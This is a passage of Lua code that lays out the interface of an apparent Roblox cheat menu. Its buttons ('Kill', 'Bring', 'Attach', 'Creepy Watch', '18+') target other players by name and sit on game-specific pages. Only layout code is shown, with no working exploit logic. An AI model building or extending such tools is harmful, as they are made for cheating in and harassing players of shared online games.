Color3.new(0.92549, 0.941177, 0.945098) BrickHats.TextSize = 17 RapidPunch.Name = "RapidPunch" RapidPunch.Parent = ExtraBaseBackGround2 RapidPunch.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) RapidPunch.BorderSizePixel = 0 RapidPunch.Position = UDim2.new(0.0901560932, 0, 0.731094897, 0) RapidPunch.Size = UDim2.new(0, 92, 0, 25) RapidPunch.Font = Enum.Font.SourceSans RapidPunch.FontSize = Enum.FontSize.Size18 RapidPunch.Text = "RapidPunch" RapidPunch.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) RapidPunch.TextSize = 17 ExtraBaseBackGround2Side.Name = "ExtraBaseBackGround2Side" ExtraBaseBackGround2Side.Parent = ExtraBaseBackGround2 ExtraBaseBackGround2Side.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) ExtraBaseBackGround2Side.BorderSizePixel = 0 ExtraBaseBackGround2Side.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround2Side.Size = UDim2.new(1, 0, 0.109999999, 0) ExtraBaseBackGround3.Name = "ExtraBaseBackGround3" ExtraBaseBackGround3.Parent = Extra_1 ExtraBaseBackGround3.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) ExtraBaseBackGround3.BorderSizePixel = 0 ExtraBaseBackGround3.Position = UDim2.new(0.667999983, 0, 0.400000006, 0) ExtraBaseBackGround3.Size = UDim2.new(0.25, 0, 0.600000024, 0) PunchFollow.Name = "PunchFollow" PunchFollow.Parent = ExtraBaseBackGround3 PunchFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) PunchFollow.BorderSizePixel = 0 PunchFollow.Position = UDim2.new(0.0901560932, 0, 0.0731094852, 0) PunchFollow.Size = UDim2.new(0, 92, 0, 25) PunchFollow.Font = Enum.Font.SourceSans PunchFollow.FontSize = Enum.FontSize.Size18 PunchFollow.Text = "Punch Follow" PunchFollow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) PunchFollow.TextSize = 17 ArmFollow.Name = "ArmFollow" ArmFollow.Parent = ExtraBaseBackGround3 ArmFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) ArmFollow.BorderSizePixel = 0 ArmFollow.Position = UDim2.new(0.0901560932, 0, 0.292437941, 0) ArmFollow.Size = UDim2.new(0, 92, 0, 25) ArmFollow.Font = Enum.Font.SourceSans ArmFollow.FontSize = Enum.FontSize.Size18 ArmFollow.Text = "Arm Follow" ArmFollow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) ArmFollow.TextSize = 17 Spin.Name = "Spin" Spin.Parent = ExtraBaseBackGround3 Spin.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) Spin.BorderSizePixel = 0 Spin.Position = UDim2.new(0.0901560932, 0, 0.511766434, 0) Spin.Size = UDim2.new(0, 92, 0, 25) Spin.Font = Enum.Font.SourceSans Spin.FontSize = Enum.FontSize.Size18 Spin.Text = "Spin" Spin.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Spin.TextSize = 17 Faint.Name = "Faint" Faint.Parent = ExtraBaseBackGround3 Faint.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) Faint.BorderSizePixel = 0 Faint.Position = UDim2.new(0.0901560932, 0, 0.731094897, 0) Faint.Size = UDim2.new(0, 92, 0, 25) Faint.Font = Enum.Font.SourceSans Faint.FontSize = Enum.FontSize.Size18 Faint.Text = "Faint" Faint.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Faint.TextSize = 17 ExtraBaseBackGround3Side.Name = "ExtraBaseBackGround3Side" ExtraBaseBackGround3Side.Parent = ExtraBaseBackGround3 ExtraBaseBackGround3Side.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) ExtraBaseBackGround3Side.BorderSizePixel = 0 ExtraBaseBackGround3Side.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround3Side.Size = UDim2.new(1, 0, 0.109999999, 0) Extra_2.Name = "Extra_2" Extra_2.Parent = Pages Extra_2.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_2.BorderSizePixel = 0 Extra_2.Position = UDim2.new(1, 0, 0, 0) Extra_2.Size = UDim2.new(1, 0, 1, 0) Extra_Image_2.Name = "Extra_Image" Extra_Image_2.Parent = Extra_2 Extra_Image_2.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Image_2.BackgroundTransparency = 1 Extra_Image_2.Position = UDim2.new(0.80375582, 0, 0.0439298227, 0) Extra_Image_2.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Extra_Image_2.Image = "http://www.roblox.com/asset/?id=1282931168" ExtraText_2.Name = "ExtraText" ExtraText_2.Parent = Extra_2 ExtraText_2.BackgroundColor3 = Color3.new(1, 1, 1) ExtraText_2.BackgroundTransparency = 1 ExtraText_2.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) ExtraText_2.Size = UDim2.new(0.65658927, 0, 0.175719291, 0) ExtraText_2.Font = Enum.Font.SourceSansItalic ExtraText_2.FontSize = Enum.FontSize.Size24 ExtraText_2.Text = "Cool and unique commands for other players!" ExtraText_2.TextSize = 19 ExtraText_2.TextWrapped = true Extra_Title_2.Name = "Extra_Title" Extra_Title_2.Parent = Extra_2 Extra_Title_2.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Title_2.BackgroundTransparency = 1 Extra_Title_2.Position = UDim2.new(0.226410091, 0, 0, 0) Extra_Title_2.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) Extra_Title_2.Font = Enum.Font.SourceSansBold Extra_Title_2.FontSize = Enum.FontSize.Size28 Extra_Title_2.Text = "Extra" Extra_Title_2.TextSize = 25 ExtraBaseBackGround2_2.Name = "ExtraBaseBackGround2" ExtraBaseBackGround2_2.Parent = Extra_2 ExtraBaseBackGround2_2.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) ExtraBaseBackGround2_2.BorderSizePixel = 0 ExtraBaseBackGround2_2.Position = UDim2.new(0.158000007, 0, 0.38499999, 0) ExtraBaseBackGround2_2.Size = UDim2.new(0.667909801, 0, 0.615017533, 0) CrouchAttack.Name = "CrouchAttack" CrouchAttack.Parent = ExtraBaseBackGround2_2 CrouchAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) CrouchAttack.BorderSizePixel = 0 CrouchAttack.Position = UDim2.new(0.576693356, 0, 0.321942836, 0) CrouchAttack.Size = UDim2.new(0, 92, 0, 25) CrouchAttack.Font = Enum.Font.SourceSans CrouchAttack.FontSize = Enum.FontSize.Size18 CrouchAttack.Text = "Crouch Attack" CrouchAttack.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CrouchAttack.TextSize = 17 WalkThrough.Name = "WalkThrough" WalkThrough.Parent = ExtraBaseBackGround2_2 WalkThrough.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) WalkThrough.BorderSizePixel = 0 WalkThrough.Position = UDim2.new(0.118730992, 0, 0.536571443, 0) WalkThrough.Size = UDim2.new(0, 92, 0, 25) WalkThrough.Font = Enum.Font.SourceSans WalkThrough.FontSize = Enum.FontSize.Size18 WalkThrough.Text = "Walk Through" WalkThrough.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) WalkThrough.TextSize = 17 CreepyWatch.Name = "CreepyWatch" CreepyWatch.Parent = ExtraBaseBackGround2_2 CreepyWatch.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) CreepyWatch.BorderSizePixel = 0 CreepyWatch.Position = UDim2.new(0.118730992, 0, 0.321942836, 0) CreepyWatch.Size = UDim2.new(0, 92, 0, 25) CreepyWatch.Font = Enum.Font.SourceSans CreepyWatch.FontSize = Enum.FontSize.Size18 CreepyWatch.Text = "Creepy Watch" CreepyWatch.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CreepyWatch.TextSize = 17 SpinAttack.Name = "SpinAttack" SpinAttack.Parent = ExtraBaseBackGround2_2 SpinAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) SpinAttack.BorderSizePixel = 0 SpinAttack.Position = UDim2.new(0.576693356, 0, 0.536571443, 0) SpinAttack.Size = UDim2.new(0, 92, 0, 25) SpinAttack.Font = Enum.Font.SourceSans SpinAttack.FontSize = Enum.FontSize.Size18 SpinAttack.Text = "Spin Attack" SpinAttack.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SpinAttack.TextSize = 17 ExtraBaseBackGround2Side_2.Name = "ExtraBaseBackGround2Side" ExtraBaseBackGround2Side_2.Parent = ExtraBaseBackGround2_2 ExtraBaseBackGround2Side_2.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) ExtraBaseBackGround2Side_2.BorderSizePixel = 0 ExtraBaseBackGround2Side_2.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround2Side_2.Size = UDim2.new(1, 0, 0.109999999, 0) TXTBOX_PlrNameEXTRA.Name = "TXTBOX_PlrNameEXTRA" TXTBOX_PlrNameEXTRA.Parent = ExtraBaseBackGround2_2 TXTBOX_PlrNameEXTRA.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrNameEXTRA.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrNameEXTRA.BorderSizePixel = 0 TXTBOX_PlrNameEXTRA.Position = UDim2.new(0.22050041, 0, 0.0715428591, 0) TXTBOX_PlrNameEXTRA.Size = UDim2.new(0.559731781, 0, 0.143085718, 0) TXTBOX_PlrNameEXTRA.ZIndex = 2 TXTBOX_PlrNameEXTRA.Font = Enum.Font.SourceSans TXTBOX_PlrNameEXTRA.FontSize = Enum.FontSize.Size14 TXTBOX_PlrNameEXTRA.Text = "Player" TXTBOX_PlrNameEXTRA.TextScaled = true TXTBOX_PlrNameEXTRA.TextSize = 14 TXTBOX_PlrNameEXTRA.TextWrapped = true _18.Name = "18+" _18.Parent = ExtraBaseBackGround2_2 _18.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) _18.BorderSizePixel = 0 _18.Position = UDim2.new(0.576693356, 0, 0.75120002, 0) _18.Size = UDim2.new(0, 92, 0, 25) _18.Font = Enum.Font.SourceSans _18.FontSize = Enum.FontSize.Size18 _18.Text = "18+" _18.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) _18.TextSize = 17 SlamPropulsion.Name = "SlamPropulsion" SlamPropulsion.Parent = ExtraBaseBackGround2_2 SlamPropulsion.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) SlamPropulsion.BorderSizePixel = 0 SlamPropulsion.Position = UDim2.new(0.118730992, 0, 0.75120002, 0) SlamPropulsion.Size = UDim2.new(0, 92, 0, 25) SlamPropulsion.Font = Enum.Font.SourceSans SlamPropulsion.FontSize = Enum.FontSize.Size18 SlamPropulsion.Text = "Slam Propulsion" SlamPropulsion.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SlamPropulsion.TextSize = 15 SlamPropulsion.TextWrapped = true Extra_backPAGE1.Name = "Extra_backPAGE1" Extra_backPAGE1.Parent = Extra_2 Extra_backPAGE1.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Extra_backPAGE1.BorderSizePixel = 0 Extra_backPAGE1.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Extra_backPAGE1.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Extra_backPAGE1.Font = Enum.Font.SourceSansLight Extra_backPAGE1.FontSize = Enum.FontSize.Size24 Extra_backPAGE1.Text = "Prev" Extra_backPAGE1.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_backPAGE1.TextSize = 22 Character_toPAGE1_IMAGE_3.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE_3.Parent = Extra_backPAGE1 Character_toPAGE1_IMAGE_3.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE_3.BorderSizePixel = 0 Character_toPAGE1_IMAGE_3.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE_3.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE_3.Image = "http://www.roblox.com/asset/?id=1282894968" Others_3.Name = "Others_3" Others_3.Parent = Pages Others_3.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_3.BorderSizePixel = 0 Others_3.Position = UDim2.new(1, 0, 0, 0) Others_3.Size = UDim2.new(1, 0, 1, 0) OthersTitle_3.Name = "OthersTitle" OthersTitle_3.Parent = Others_3 OthersTitle_3.BackgroundColor3 = Color3.new(1, 1, 1) OthersTitle_3.BackgroundTransparency = 1 OthersTitle_3.Position = UDim2.new(0.226410091, 0, 0, 0) OthersTitle_3.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) OthersTitle_3.Font = Enum.Font.SourceSansBold OthersTitle_3.FontSize = Enum.FontSize.Size28 OthersTitle_3.Text = "Others" OthersTitle_3.TextSize = 25 Other_Image3.Name = "Other_Image3" Other_Image3.Parent = Others_3 Other_Image3.BackgroundColor3 = Color3.new(1, 1, 1) Other_Image3.BackgroundTransparency = 1 Other_Image3.Position = UDim2.new(0.124525554, 0, 0.219649136, 0) Other_Image3.Size = UDim2.new(0.101884536, 0, 0.197684199, 0) Other_Image3.Image = "http://www.roblox.com/asset/?id=1281286925" OthersText_3.Name = "OthersText" OthersText_3.Parent = Others_3 OthersText_3.BackgroundColor3 = Color3.new(1, 1, 1) OthersText_3.BackgroundTransparency = 1 OthersText_3.Position = UDim2.new(0.237730592, 0, 0.197684199, 0) OthersText_3.Size = UDim2.new(0.65658927, 0, 0.219649136, 0) OthersText_3.Font = Enum.Font.SourceSansItalic OthersText_3.FontSize = Enum.FontSize.Size24 OthersText_3.Text = "Warning! You require tools in your inventory to use these. Some games/tools do not work." OthersText_3.TextSize = 19 OthersText_3.TextWrapped = true TXTBOX_PlrNameOTHER3.Name = "TXTBOX_PlrNameOTHER3" TXTBOX_PlrNameOTHER3.Parent = Others_3 TXTBOX_PlrNameOTHER3.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrNameOTHER3.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrNameOTHER3.BorderSizePixel = 0 TXTBOX_PlrNameOTHER3.Position = UDim2.new(0.249051109, 0, 0.571087658, 0) TXTBOX_PlrNameOTHER3.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_PlrNameOTHER3.ZIndex = 2 TXTBOX_PlrNameOTHER3.Font = Enum.Font.SourceSans TXTBOX_PlrNameOTHER3.FontSize = Enum.FontSize.Size14 TXTBOX_PlrNameOTHER3.Text = "Player" TXTBOX_PlrNameOTHER3.TextScaled = true TXTBOX_PlrNameOTHER3.TextSize = 14 TXTBOX_PlrNameOTHER3.TextWrapped = true othersBaseBackground3.Name = "othersBaseBackground3" othersBaseBackground3.Parent = Others_3 othersBaseBackground3.BackgroundColor3 = Color3.new(0.752941, 0.223529, 0.168627) othersBaseBackground3.BorderSizePixel = 0 othersBaseBackground3.Position = UDim2.new(0.125, 0, 0.518999994, 0) othersBaseBackground3.Size = UDim2.new(0.769794285, 0, 0.483228087, 0) FreeFall.Name = "FreeFall" FreeFall.Parent = othersBaseBackground3 FreeFall.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) FreeFall.BorderSizePixel = 0 FreeFall.Position = UDim2.new(0.367916405, 0, 0.364218175, 0) FreeFall.Size = UDim2.new(0, 92, 0, 25) FreeFall.Font = Enum.Font.SourceSans FreeFall.FontSize = Enum.FontSize.Size24 FreeFall.Text = "Free Fall" FreeFall.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) FreeFall.TextSize = 22 Attach.Name = "Attach" Attach.Parent = othersBaseBackground3 Attach.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) Attach.BorderSizePixel = 0 Attach.Position = UDim2.new(0.67696619, 0, 0.364218175, 0) Attach.Size = UDim2.new(0, 92, 0, 25) Attach.Font = Enum.Font.SourceSans Attach.FontSize = Enum.FontSize.Size24 Attach.Text = "Attach" Attach.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Attach.TextSize = 22 Bring.Name = "Bring" Bring.Parent = othersBaseBackground3 Bring.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) Bring.BorderSizePixel = 0 Bring.Position = UDim2.new(0.67696619, 0, 0.682909131, 0) Bring.Size = UDim2.new(0, 92, 0, 25) Bring.Font = Enum.Font.SourceSans Bring.FontSize = Enum.FontSize.Size24 Bring.Text = "Bring" Bring.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Bring.TextSize = 22 SafeKill.Name = "SafeKill" SafeKill.Parent = othersBaseBackground3 SafeKill.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) SafeKill.BorderSizePixel = 0 SafeKill.Position = UDim2.new(0.367916405, 0, 0.682909131, 0) SafeKill.Size = UDim2.new(0, 92, 0, 25) SafeKill.Font = Enum.Font.SourceSans SafeKill.FontSize = Enum.FontSize.Size24 SafeKill.Text = "SafeKill" SafeKill.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SafeKill.TextSize = 22 SuperSpin.Name = "SuperSpin" SuperSpin.Parent = othersBaseBackground3 SuperSpin.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) SuperSpin.BorderSizePixel = 0 SuperSpin.Position = UDim2.new(0.0588666238, 0, 0.682909131, 0) SuperSpin.Size = UDim2.new(0, 92, 0, 25) SuperSpin.Font = Enum.Font.SourceSans SuperSpin.FontSize = Enum.FontSize.Size24 SuperSpin.Text = "SuperSpin" SuperSpin.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SuperSpin.TextSize = 22 Kill.Name = "Kill" Kill.Parent = othersBaseBackground3 Kill.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) Kill.BorderSizePixel = 0 Kill.Position = UDim2.new(0.0588666238, 0, 0.364218175, 0) Kill.Size = UDim2.new(0, 92, 0, 25) Kill.Font = Enum.Font.SourceSans Kill.FontSize = Enum.FontSize.Size24 Kill.Text = "Kill" Kill.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Kill.TextSize = 22 Others_backPAGE2.Name = "Others_backPAGE2" Others_backPAGE2.Parent = Others_3 Others_backPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_backPAGE2.BorderSizePixel = 0 Others_backPAGE2.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Others_backPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_backPAGE2.Font = Enum.Font.SourceSansLight Others_backPAGE2.FontSize = Enum.FontSize.Size24 Others_backPAGE2.Text = "Prev" Others_backPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_backPAGE2.TextSize = 22 Character_toPAGE1_IMAGE_4.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE_4.Parent = Others_backPAGE2 Character_toPAGE1_IMAGE_4.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE_4.BorderSizePixel = 0 Character_toPAGE1_IMAGE_4.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE_4.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE_4.Image = "http://www.roblox.com/asset/?id=1282894968" Games.Name = "Games" Games.Parent = Pages Games.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Games.BorderSizePixel = 0 Games.Position = UDim2.new(1, 0, 0, 0) Games.Size = UDim2.new(1, 0, 1, 0) Games_IMAGE.Name = "Games_IMAGE" Games_IMAGE.Parent = Games Games_IMAGE.BackgroundColor3 = Color3.new(1, 1, 1) Games_IMAGE.BackgroundTransparency = 1 Games_IMAGE.Position = UDim2.new(0.0679230243, 0, 0.109824568, 0) Games_IMAGE.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Games_IMAGE.Image = "http://www.roblox.com/asset/?id=1281454262" GamesText.Name = "GamesText" GamesText.Parent = Games GamesText.BackgroundColor3 = Color3.new(1, 1, 1) GamesText.BackgroundTransparency = 1 GamesText.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) GamesText.Size = UDim2.new(0.65658927, 0, 0.175719291, 0) GamesText.Font = Enum.Font.SourceSansItalic GamesText.FontSize = Enum.FontSize.Size24 GamesText.Text = "Not a completed part, I will be updating with more games." GamesText.TextSize = 19 GamesText.TextWrapped = true Games_TITLE.Name = "Games_TITLE" Games_TITLE.Parent = Games Games_TITLE.BackgroundColor3 = Color3.new(1, 1, 1) Games_TITLE.BackgroundTransparency = 1 Games_TITLE.Position = UDim2.new(0.226410091, 0, 0, 0) Games_TITLE.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) Games_TITLE.Font = Enum.Font.SourceSansBold Games_TITLE.FontSize = Enum.FontSize.Size28 Games_TITLE.Text = "Games" Games_TITLE.TextSize = 25 Games_IMAGE2.Name = "Games_IMAGE2" Games_IMAGE2.Parent = Games Games_IMAGE2.BackgroundColor3 = Color3.new(1, 1, 1) Games_IMAGE2.BackgroundTransparency = 1 Games_IMAGE2.Position = UDim2.new(0.815076292, 0, 0.109824568, 0) Games_IMAGE2.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Games_IMAGE2.Image = "http://www.roblox.com/asset/?id=1281454262" SwordFightingTournament.Name = "SwordFightingTournament" SwordFightingTournament.Parent = Games SwordFightingTournament.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) SwordFightingTournament.BorderSizePixel = 0 SwordFightingTournament.Position = UDim2.new(0.350935638, 0, 0.329473704, 0) SwordFightingTournament.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) SwordFightingTournament.Font = Enum.Font.SourceSans SwordFightingTournament.FontSize = Enum.FontSize.Size14 SwordFightingTournament.Text = "Sword Fighting Tournament" SwordFightingTournament.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SwordFightingTournament.TextScaled = true SwordFightingTournament.TextSize = 14 SwordFightingTournament.TextWrapped = true PlatesOfFateMayhem.Name = "PlatesOfFateMayhem" PlatesOfFateMayhem.Parent = Games PlatesOfFateMayhem.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) PlatesOfFateMayhem.BorderSizePixel = 0 PlatesOfFateMayhem.Position = UDim2.new(0.350935638, 0, 0.483228087, 0) PlatesOfFateMayhem.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) PlatesOfFateMayhem.Font = Enum.Font.SourceSans PlatesOfFateMayhem.FontSize = Enum.FontSize.Size14 PlatesOfFateMayhem.Text = "Plates of Fate: Mayhem" PlatesOfFateMayhem.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) PlatesOfFateMayhem.TextScaled = true PlatesOfFateMayhem.TextSize = 14 PlatesOfFateMayhem.TextWrapped = true GamesText2.Name = "GamesText2" GamesText2.Parent = Games GamesText2.BackgroundColor3 = Color3.new(1, 1, 1) GamesText2.BackgroundTransparency = 1 GamesText2.Position = UDim2.new(0.0679230243, 0, 0.768771946, 0) GamesText2.Size = UDim2.new(0.871678829, 0, 0.175719291, 0) GamesText2.Font = Enum.Font.SourceSansItalic GamesText2.FontSize = Enum.FontSize.Size24 GamesText2.Text = "Since games update, buttons can sometimes not work. If they do not work, please let me know so I can update." GamesText2.TextSize = 19 GamesText2.TextWrapped = true Frappe.Name = "Frappe" Frappe.Parent = Games Frappe.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Frappe.BorderSizePixel = 0 Frappe.Position = UDim2.new(0.350935638, 0, 0.636982441, 0) Frappe.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) Frappe.Font = Enum.Font.SourceSans Frappe.FontSize = Enum.FontSize.Size14 Frappe.Text = "Frappe" Frappe.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Frappe.TextScaled = true Frappe.TextSize = 14 Frappe.TextWrapped = true Frappe_2.Name = "Frappe" Frappe_2.Parent = Games Frappe_2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Frappe_2.BorderSizePixel = 0 Frappe_2.Position = UDim2.new(0.667909801, 0, 0.329473704, 0) Frappe_2.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) Frappe_2.Font = Enum.Font.SourceSans Frappe_2.FontSize = Enum.FontSize.Size14 Frappe_2.Text = "Frappe" Frappe_2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Frappe_2.TextScaled = true Frappe_2.TextSize = 14 Frappe_2.TextWrapped = true MenuFrame.Name = "MenuFrame" MenuFrame.Parent = MainFrame MenuFrame.BackgroundColor3 = Color3.new(0.741176, 0.764706, 0.780392) MenuFrame.BorderSizePixel = 0 MenuFrame.Position = UDim2.new(-0.38499999, 0, 0.075000003, 0) MenuFrame.Size = UDim2.new(0, 170, 0, 271) Welcome.Name = "Welcome" Welcome.Parent = MenuFrame Welcome.BackgroundColor3 = Color3.new(1, 1, 1) Welcome.BackgroundTransparency = 1 Welcome.Position = UDim2.new(0.0294333119, 0, 0.0184797049, 0) Welcome.Size = UDim2.new(0.941865981, 0, 0.0739188194, 0) Welcome.Font = Enum.Font.SourceSansLight Welcome.FontSize = Enum.FontSize.Size14 Welcome.Text = "Welcome," Welcome.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Welcome.TextScaled = true Welcome.TextSize = 14 Welcome.TextWrapped = true NameOfPlayer.Name = "NameOfPlayer" NameOfPlayer.Parent = MenuFrame NameOfPlayer.BackgroundColor3 = Color3.new(1, 1, 1) NameOfPlayer.BackgroundTransparency = 1 NameOfPlayer.Position = UDim2.new(0, 0, 0.0923985243, 0) NameOfPlayer.Size = UDim2.new(0.971299291, 0, 0.0739188194, 0) NameOfPlayer.Font = Enum.Font.SourceSansItalic NameOfPlayer.FontSize = Enum.FontSize.Size14 NameOfPlayer.Text = "PlayerName" NameOfPlayer.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) NameOfPlayer.TextScaled = true NameOfPlayer.TextSize = 14 NameOfPlayer.TextWrapped = true T_Information.Name = "T_Information" T_Information.Parent = MenuFrame T_Information.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Information.BorderSizePixel = 0 T_Information.Position = UDim2.new(0, 0, 0.221756458, 0) T_Information.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Information.Font = Enum.Font.SourceSans T_Information.FontSize = Enum.FontSize.Size18 T_Information.Text = "Information" T_Information.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Information.TextSize = 16 T_Information.TextXAlignment = Enum.TextXAlignment.Left T_InfoImage.Name = "T_InfoImage" T_InfoImage.Parent = T_Information T_InfoImage.BackgroundColor3 = Color3.new(1, 1, 1) T_InfoImage.BackgroundTransparency = 1 T_InfoImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_InfoImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_InfoImage.Image = "http://www.roblox.com/asset/?id=1281284684" T_Character.Name = "T_Character" T_Character.Parent = MenuFrame T_Character.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Character.BorderSizePixel = 0 T_Character.Position = UDim2.new(0, 0, 0.388073802, 0) T_Character.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Character.Font = Enum.Font.SourceSans T_Character.FontSize = Enum.FontSize.Size18 T_Character.Text = "Character" T_Character.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Character.TextSize = 16 T_Character.TextXAlignment = Enum.TextXAlignment.Left T_CharImage.Name = "T_CharImage" T_CharImage.Parent = T_Character T_CharImage.BackgroundColor3 = Color3.new(1, 1, 1) T_CharImage.BackgroundTransparency = 1 T_CharImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_CharImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_CharImage.Image = "http://www.roblox.com/asset/?id=1281299598" T_Games.Name = "T_Games" T_Games.Parent = MenuFrame T_Games.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Games.BorderSizePixel = 0 T_Games.Position = UDim2.new(0, 0, 0.498952031, 0) T_Games.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Games.Font = Enum.Font.SourceSans T_Games.FontSize = Enum.FontSize.Size18 T_Games.Text = "Games" T_Games.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Games.TextSize = 16 T_Games.TextXAlignment = Enum.TextXAlignment.Left T_GameImage.Name = "T_GameImage" T_GameImage.Parent = T_Games T_GameImage.BackgroundColor3 = Color3.new(1, 1, 1) T_GameImage.BackgroundTransparency = 1 T_GameImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_GameImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_GameImage.Image = "http://www.roblox.com/asset/?id=1281454262" T_Others.Name = "T_Others" T_Others.Parent = MenuFrame T_Others.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Others.BorderSizePixel = 0 T_Others.Position = UDim2.new(0, 0, 0.60983026, 0) T_Others.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Others.Font = Enum.Font.SourceSans T_Others.FontSize = Enum.FontSize.Size18 T_Others.Text = "Others" T_Others.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Others.TextSize = 16 T_Others.TextXAlignment = Enum.TextXAlignment.Left T_OtherImage.Name = "T_OtherImage" T_OtherImage.Parent = T_Others T_OtherImage.BackgroundColor3 = Color3.new(1, 1, 1) T_OtherImage.BackgroundTransparency = 1 T_OtherImage.Position = 